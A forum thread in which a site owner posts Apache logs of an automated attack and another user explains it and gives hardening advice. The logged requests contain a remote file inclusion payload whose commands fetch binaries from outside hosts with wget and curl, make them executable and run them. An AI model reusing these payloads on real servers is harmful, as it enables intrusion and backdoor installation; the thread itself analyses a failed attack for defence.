- Posts: 12
- Thank you received: 0
Real Life SPAM visit to my Website!
- franco190453
- Topic Author
- Offline
- New Member
Less
More
18 years 7 months ago #14315
by franco190453
Real Life SPAM visit to my Website! was created by franco190453
This is the details reported by Apache from an unfriendly visit:
Question: What did this ugly citizen try to do?
Did he cause harm? Where is this IP from?
What should be the security procedure to handle this illegal visitor?
[code:1]
200.105.234.43 - - [16/Apr/2006:20:03:50 -0600] "POST /xmlrpc.php HTTP/1.1" 404 295\par
200.105.234.43 - - [16/Apr/2006:20:03:54 -0600] "POST /blog/xmlrpc.php HTTP/1.1" 404 300\par
200.105.234.43 - - [16/Apr/2006:20:03:58 -0600] "POST /blog/xmlsrv/xmlrpc.php HTTP/1.1" 404 307\par
200.105.234.43 - - [16/Apr/2006:20:04:02 -0600] "POST /blogs/xmlsrv/xmlrpc.php HTTP/1.1" 404 308\par
200.105.234.43 - - [16/Apr/2006:20:04:08 -0600] "POST /phpgroupware/xmlrpc.php HTTP/1.1" 404 308\par
200.105.234.43 - - [16/Apr/2006:20:04:10 -0600] "POST /wordpress/xmlrpc.php HTTP/1.1" 404 305\par
200.105.234.43 - - [16/Apr/2006:20:04:10 -0600] "POST /drupal/xmlrpc.php HTTP/1.1" 404 302\par
200.105.234.43 - - [16/Apr/2006:20:04:16 -0600] "POST /xmlrpc/xmlrpc.php HTTP/1.1" 404 302\par
200.105.234.43 - - [16/Apr/2006:20:04:17 -0600] "POST /xmlsrv/xmlrpc.php HTTP/1.1" 404 302\par
200.105.234.43 - - [16/Apr/2006:20:04:20 -0600] "GET /index2.php?option=com_content&do_pdf=1&id=1index2.php? _REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS= &mosConfig_absolute_path=http://210.3.4.193/cmd.txt?&cmd=cd%20/tmp; wget%2070.168.74.193/strange;chmod%20744%20strange; ./strange;cd%20/var/tmp;curl%20-o%20ar%20 http://207.90.211.54/ar;chmod%20744%20ar; ./ar;echo%20YYY;echo| HTTP/1.1" 404 295\par
200.105.234.43 - - [16/Apr/2006:20:04:23 -0600] "GET /index.php?option=com_content&do_pdf=1&id=1index2.php? _REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS= &mosConfig_absolute_path=http://210.3.4.193/cmd.txt? &cmd=cd%20/tmp;wget%2070.168.74.193/strange; chmod%20744%20strange;./strange;cd%20/var/tmp; curl%20-o%20ar%20http://207.90.211.54/ar; chmod%20744%20ar;./ar;echo%20YYY;echo| HTTP/1.1" 404 294\par
200.105.234.43 - - [16/Apr/2006:20:04:32 -0600] "POST /xmlrpc.php HTTP/1.1" 404 295\par[/code:1]
Question: What did this ugly citizen try to do?
Did he cause harm? Where is this IP from?
What should be the security procedure to handle this illegal visitor?
[code:1]
200.105.234.43 - - [16/Apr/2006:20:03:50 -0600] "POST /xmlrpc.php HTTP/1.1" 404 295\par
200.105.234.43 - - [16/Apr/2006:20:03:54 -0600] "POST /blog/xmlrpc.php HTTP/1.1" 404 300\par
200.105.234.43 - - [16/Apr/2006:20:03:58 -0600] "POST /blog/xmlsrv/xmlrpc.php HTTP/1.1" 404 307\par
200.105.234.43 - - [16/Apr/2006:20:04:02 -0600] "POST /blogs/xmlsrv/xmlrpc.php HTTP/1.1" 404 308\par
200.105.234.43 - - [16/Apr/2006:20:04:08 -0600] "POST /phpgroupware/xmlrpc.php HTTP/1.1" 404 308\par
200.105.234.43 - - [16/Apr/2006:20:04:10 -0600] "POST /wordpress/xmlrpc.php HTTP/1.1" 404 305\par
200.105.234.43 - - [16/Apr/2006:20:04:10 -0600] "POST /drupal/xmlrpc.php HTTP/1.1" 404 302\par
200.105.234.43 - - [16/Apr/2006:20:04:16 -0600] "POST /xmlrpc/xmlrpc.php HTTP/1.1" 404 302\par
200.105.234.43 - - [16/Apr/2006:20:04:17 -0600] "POST /xmlsrv/xmlrpc.php HTTP/1.1" 404 302\par
200.105.234.43 - - [16/Apr/2006:20:04:20 -0600] "GET /index2.php?option=com_content&do_pdf=1&id=1index2.php? _REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS= &mosConfig_absolute_path=http://210.3.4.193/cmd.txt?&cmd=cd%20/tmp; wget%2070.168.74.193/strange;chmod%20744%20strange; ./strange;cd%20/var/tmp;curl%20-o%20ar%20 http://207.90.211.54/ar;chmod%20744%20ar; ./ar;echo%20YYY;echo| HTTP/1.1" 404 295\par
200.105.234.43 - - [16/Apr/2006:20:04:23 -0600] "GET /index.php?option=com_content&do_pdf=1&id=1index2.php? _REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS= &mosConfig_absolute_path=http://210.3.4.193/cmd.txt? &cmd=cd%20/tmp;wget%2070.168.74.193/strange; chmod%20744%20strange;./strange;cd%20/var/tmp; curl%20-o%20ar%20http://207.90.211.54/ar; chmod%20744%20ar;./ar;echo%20YYY;echo| HTTP/1.1" 404 294\par
200.105.234.43 - - [16/Apr/2006:20:04:32 -0600] "POST /xmlrpc.php HTTP/1.1" 404 295\par[/code:1]
18 years 7 months ago #14321
by nske
Replied by nske on topic Re: Real Life SPAM visit to my Website!
This was apparently caused by some little program that randomly tried to exploit the php xml-rpc bug through a number of popular scripts. It attempted to download a program uploaded somewhere at the web (probably a backdoor) and execute it. From what appears from the logs, apache returned a 404 (not found) error on all the requests so nothing happened.
To minimize your exposure against such attacks and their effects, first of all treat the user running apache as an untrusted user. You should regard every file on the filesystems that apache has read access to, as very likely to be read by an intruder. Unfortunately, some things like database account info need to be accessible, however try to keep this to a minimum. Similarily, any file or directory that apache has write access to, can allow the intruder to upload a backdoor and execute permissions can make things easier for him, so be careful with every files' permissions and consider mounting filesystems with the noexec argument. Furthermore, if possible, run apache on a seperate chroot or jail. PHP should run on safe mode and few other options definable through php.ini can have an impact on security (they are documented at the official PHP documentation).
Other than that, a well configured firewall can minimize the chance for a backdoor to work and some active application-layer monitoring software, like Snort, can detect and block these kinds of attempts. Specifically for apache, there is also [url=http://www.modsecurity.org[/url]Mod Security[/url] that can serve the same purpose.
To minimize your exposure against such attacks and their effects, first of all treat the user running apache as an untrusted user. You should regard every file on the filesystems that apache has read access to, as very likely to be read by an intruder. Unfortunately, some things like database account info need to be accessible, however try to keep this to a minimum. Similarily, any file or directory that apache has write access to, can allow the intruder to upload a backdoor and execute permissions can make things easier for him, so be careful with every files' permissions and consider mounting filesystems with the noexec argument. Furthermore, if possible, run apache on a seperate chroot or jail. PHP should run on safe mode and few other options definable through php.ini can have an impact on security (they are documented at the official PHP documentation).
Other than that, a well configured firewall can minimize the chance for a backdoor to work and some active application-layer monitoring software, like Snort, can detect and block these kinds of attempts. Specifically for apache, there is also [url=http://www.modsecurity.org[/url]Mod Security[/url] that can serve the same purpose.
- franco190453
- Topic Author
- Offline
- New Member
Less
More
- Posts: 12
- Thank you received: 0
18 years 7 months ago #14322
by franco190453
Replied by franco190453 on topic To Nske
Thanks Nske.
I will take into consideration, every single word you said.
Thanks Again!!!!.
I will take into consideration, every single word you said.
Thanks Again!!!!.
Time to create page: 0.116 seconds